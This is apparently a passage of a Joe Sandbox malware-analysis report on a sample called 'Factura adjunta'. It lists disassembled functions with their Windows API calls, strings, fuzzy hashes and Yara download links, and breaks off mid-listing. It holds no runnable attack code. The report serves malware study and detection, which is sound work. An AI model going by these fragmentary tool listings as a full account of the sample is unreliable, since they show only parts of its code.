                            Function 007D7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 007D707B
                              • Part of subcall function 007D8D68: __getptd_noexit.LIBCMT ref: 007D8D68
                            • __gmtime64_s.LIBCMT ref: 007D7114
                            • __gmtime64_s.LIBCMT ref: 007D714A
                            • __gmtime64_s.LIBCMT ref: 007D7167
                            • __allrem.LIBCMT ref: 007D71BD
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D71D9
                            • __allrem.LIBCMT ref: 007D71F0
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D720E
                            • __allrem.LIBCMT ref: 007D7225
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D7243
                            • __invoke_watson.LIBCMT ref: 007D72B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                            • Instruction ID: 8866dd28c2ca0c2a50b448e8d288358ba37c24c9b4b8c2a14863d3c5d771f1f1
                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                            • Instruction Fuzzy Hash: A371A271A05756ABD7189A69CC86B6AB3B8AF54320F14822BF514E73C1F778EA40C790
                            Function 00812A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00812A31
                            • GetMenuItemInfoW.USER32(00876890,000000FF,00000000,00000030), ref: 00812A92
                            • SetMenuItemInfoW.USER32(00876890,00000004,00000000,00000030), ref: 00812AC8
                            • Sleep.KERNEL32(000001F4), ref: 00812ADA
                            • GetMenuItemCount.USER32(?), ref: 00812B1E
                            • GetMenuItemID.USER32(?,00000000), ref: 00812B3A
                            • GetMenuItemID.USER32(?,-00000001), ref: 00812B64
                            • GetMenuItemID.USER32(?,?), ref: 00812BA9
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00812BEF
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812C03
                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812C24
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            • Opcode ID: 392a130c64a0abd872c23c71f0d7a63ede2d235eb9bf3f6dd4160e3634c66b4a
                            • Instruction ID: 53e730fef97c9bb15be2cf406909dc86a3a2ea96c23ea211213b7adaa4f877f5
                            • Opcode Fuzzy Hash: 392a130c64a0abd872c23c71f0d7a63ede2d235eb9bf3f6dd4160e3634c66b4a
                            • Instruction Fuzzy Hash: E46167B0904249EFDB21CF68D888AEEBBBCFF41318F140559E941E3252D731ADA5DB61
                            Function 0080710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00807135
                            • SafeArrayAllocData.OLEAUT32(?), ref: 0080718E
                            • VariantInit.OLEAUT32(?), ref: 008071A0
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 008071C0
                            • VariantCopy.OLEAUT32(?,?), ref: 00807213
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00807227
                            • VariantClear.OLEAUT32(?), ref: 0080723C
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00807249
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00807252
                            • VariantClear.OLEAUT32(?), ref: 00807264
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0080726F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 02d66013086b4805619fe7d7eccd45fa043599f17d713d18ec79d3e0794ad04a
                            • Instruction ID: 08dd4b6e24567a80b12b267e4078612c0256adbda380a4004c0712d7ae1406b1
                            • Opcode Fuzzy Hash: 02d66013086b4805619fe7d7eccd45fa043599f17d713d18ec79d3e0794ad04a
                            • Instruction Fuzzy Hash: B7412F35E04119AFCB00DF68DC489AEBBB9FF48354F008469FA56E7261DB30A945CB90
                            Function 00829428 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 263COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$_memset
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                            • API String ID: 2862541840-1765764032
                            • Opcode ID: a96786a73f50ee36ab5e2a2c2741a1b4c8eee1b7ee35bdae20ceca9c06e57b1f
                            • Instruction ID: f0a66461ed28fd894f07de457362034e5aeb3b0c58b3630af47a5f0d35d84c3f
                            • Opcode Fuzzy Hash: a96786a73f50ee36ab5e2a2c2741a1b4c8eee1b7ee35bdae20ceca9c06e57b1f
                            • Instruction Fuzzy Hash: 1A91CE70A00229ABDF24DFA4E848FAEBBB8FF45714F108159F555EB280D7709985CFA0
                            Function 00825A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000101,?), ref: 00825AA6
                            • inet_addr.WS2_32(?), ref: 00825AEB
                            • gethostbyname.WS2_32(?), ref: 00825AF7
                            • IcmpCreateFile.IPHLPAPI ref: 00825B05
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00825B75
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00825B8B
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00825C00
                            • WSACleanup.WS2_32 ref: 00825C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            • Opcode ID: 30c702df8da646ebdb72645e28b1514078e588c1767daa79cf36d1c3a79a2c3d
                            • Instruction ID: ca7be70b6560f2c580f3fb60744f16b5588df8d7155107f11278b0a03830a4cb
                            • Opcode Fuzzy Hash: 30c702df8da646ebdb72645e28b1514078e588c1767daa79cf36d1c3a79a2c3d
                            • Instruction Fuzzy Hash: 03517E31644710DFDB11AF24DC49B6ABBE4FF48720F148929FA56EB2A1DB74E840CB52
                            Function 007C62F2 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • argument not compiled in 16 bit mode, xrefs: 00801150
                            • ERCP, xrefs: 007C6313
                            • internal error: missing capturing bracket, xrefs: 00801158
                            • argument is not a compiled regular expression, xrefs: 00801160
                            • failed to get memory, xrefs: 007C6488
                            • internal error: opcode not recognized, xrefs: 007C647D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$_memmove
                            • String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
                            • API String ID: 2532777613-264027815
                            • Opcode ID: dac8189819988999189770c8b709c219d8dd11404a9e2152637482ee5ca5e150
                            • Instruction ID: 3f8be67137b8db36dd1073f6d214426471cc435b011c19163674662c910a9072
                            • Opcode Fuzzy Hash: dac8189819988999189770c8b709c219d8dd11404a9e2152637482ee5ca5e150
                            • Instruction Fuzzy Hash: F151A471900759DBDB28CF55C885BAABBF4FF04714F20856EEA4AC7241E7759684CB40
                            Function 0081B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0081B73B
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0081B7B1
                            • GetLastError.KERNEL32 ref: 0081B7BB
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0081B828
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: bd152d91ade64253f8b8ddb466490bc7722a2d1281b81e47e4256235bfddfc55
                            • Instruction ID: 603a7c970fa661f21beabe8b5b6b1212f2bc662e94d49e4d403a8e8ba52987b0
                            • Opcode Fuzzy Hash: bd152d91ade64253f8b8ddb466490bc7722a2d1281b81e47e4256235bfddfc55
                            • Instruction Fuzzy Hash: A3318035A00209DFDB04EF64C885AEE7BB8FF84744F104429E511E72D1DB759D82CB91
                            Function 00809471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008094F6
                            • GetDlgCtrlID.USER32 ref: 00809501
                            • GetParent.USER32 ref: 0080951D
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00809520
                            • GetDlgCtrlID.USER32(?), ref: 00809529
                            • GetParent.USER32(?), ref: 00809545
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00809548
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: a5a46625e2a85b353f289eb0f3c2e12e245d4be012172edcf46fd5c91d77a5cb
                            • Instruction ID: c0f54957c6ebd2b2ff5f65bcec6128f509500012543b5cbe242d1d435aee2072
                            • Opcode Fuzzy Hash: a5a46625e2a85b353f289eb0f3c2e12e245d4be012172edcf46fd5c91d77a5cb
                            • Instruction Fuzzy Hash: DE21B270D00204ABCF05AF65CC9AEFEBB68FF95300F104115F662972E2EB795919DA60
                            Function 0080955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008095DF
                            • GetDlgCtrlID.USER32 ref: 008095EA
                            • GetParent.USER32 ref: 00809606
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00809609
                            • GetDlgCtrlID.USER32(?), ref: 00809612
                            • GetParent.USER32(?), ref: 0080962E
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00809631
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: 23a0b6bf197179c413770098ffa6c21553cef830e938ccb30463184a211dde4d
                            • Instruction ID: 8bb970722ad50996111be9b11f9764f48a725c7a8df3dc67fa558fb057866302
                            • Opcode Fuzzy Hash: 23a0b6bf197179c413770098ffa6c21553cef830e938ccb30463184a211dde4d
                            • Instruction Fuzzy Hash: B621A474D00204BBDF05AB64CC96EFEBB68FF54300F104115F661D72E2EB795919DA20
                            Function 00809645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32 ref: 00809651
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00809666
                            • _wcscmp.LIBCMT ref: 00809678
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008096F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: 9f1d1d1811624567912bc75f3d3299691ed7d7efed17e1d39efa7cbd49e7106e
                            • Instruction ID: cbe6efea3a2cf2f2d6304df2121b38e8a97f430715ed2224c0447b75035f330c
                            • Opcode Fuzzy Hash: 9f1d1d1811624567912bc75f3d3299691ed7d7efed17e1d39efa7cbd49e7106e
                            • Instruction Fuzzy Hash: BE11803624830BFAFA012620DC0FDA6779CFB21330F200027FA61E41E3FE6B59008989
                            Function 00814189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                            Download Yara Rule
                            APIs
                            • __swprintf.LIBCMT ref: 0081419D
                            • __swprintf.LIBCMT ref: 008141AA
                              • Part of subcall function 007D38D8: __woutput_l.LIBCMT ref: 007D3931
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 008141D4
                            • LoadResource.KERNEL32(?,00000000), ref: 008141E0
                            • LockResource.KERNEL32(00000000), ref: 008141ED
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0081420D
                            • LoadResource.KERNEL32(?,00000000), ref: 0081421F
                            • SizeofResource.KERNEL32(?,00000000), ref: 0081422E
                            • LockResource.KERNEL32(?), ref: 0081423A
                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0081429B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                            • String ID:
                            • API String ID: 1433390588-0
                            • Opcode ID: c30ae7cde35948e6f7eadfb5dac9764af0cfe06510649e845e64e576ca781530
                            • Instruction ID: 362056b585b0f27cdf6c9bfba5a39f9ba5b3e7e7593371e3611cb934416e10c1
                            • Opcode Fuzzy Hash: c30ae7cde35948e6f7eadfb5dac9764af0cfe06510649e845e64e576ca781530
                            • Instruction Fuzzy Hash: B631ABB1A0120AAFCB019FA0EC48EFB7BACFF08301F044926F915D2151E774DA91CBA0
                            Function 0080A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                            Download Yara Rule
                            APIs
                            • EnumChildWindows.USER32(?,0080AA64), ref: 0080A9A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: b7b22daf9ab07e84e4bd0f67636f363966a9c61c6e57b6e16c552e9ea8e32c59
                            • Instruction ID: 13aea222d85fd235e00ee74b1f2727f120ecf03fd64c71acf9b1429f8541e9a8
                            • Opcode Fuzzy Hash: b7b22daf9ab07e84e4bd0f67636f363966a9c61c6e57b6e16c552e9ea8e32c59
                            • Instruction Fuzzy Hash: 6D917170A0070ADADB9CDFB0C885BE9FB75FF04314F10811AD99AE7291DB346959CB91
                            Function 0083B60B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00E92968), ref: 0083B6A5
                            • IsWindowEnabled.USER32(00E92968), ref: 0083B6B1
                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0083B795
                            • SendMessageW.USER32(00E92968,000000B0,?,?), ref: 0083B7CC
                            • IsDlgButtonChecked.USER32(?,?), ref: 0083B809
                            • GetWindowLongW.USER32(00E92968,000000EC), ref: 0083B82B
                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0083B843
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                            • String ID: h)
                            • API String ID: 4072528602-3328819710
                            • Opcode ID: 296c16575b126cfebe919d88c4cb6d8e22d40345b79126261b66d5766f5b75fa
                            • Instruction ID: 45f4c74e07e9ea8c7f9515c4ac856995c6474e8f00f5e8cd025675a4aeedb464
                            • Opcode Fuzzy Hash: 296c16575b126cfebe919d88c4cb6d8e22d40345b79126261b66d5766f5b75fa
                            • Instruction Fuzzy Hash: BE71E2B4600204AFDB249F64C895FBA7BB9FFD9340F044469EB46D7362E731A950CB90
                            Function 007B2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowLongW.USER32(?,000000EB), ref: 007B2EAE
                              • Part of subcall function 007B1DB3: GetClientRect.USER32(?,?), ref: 007B1DDC
                              • Part of subcall function 007B1DB3: GetWindowRect.USER32(?,?), ref: 007B1E1D
                              • Part of subcall function 007B1DB3: ScreenToClient.USER32(?,?), ref: 007B1E45
                            • GetDC.USER32 ref: 007ECF82
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ECF95
                            • SelectObject.GDI32(00000000,00000000), ref: 007ECFA3
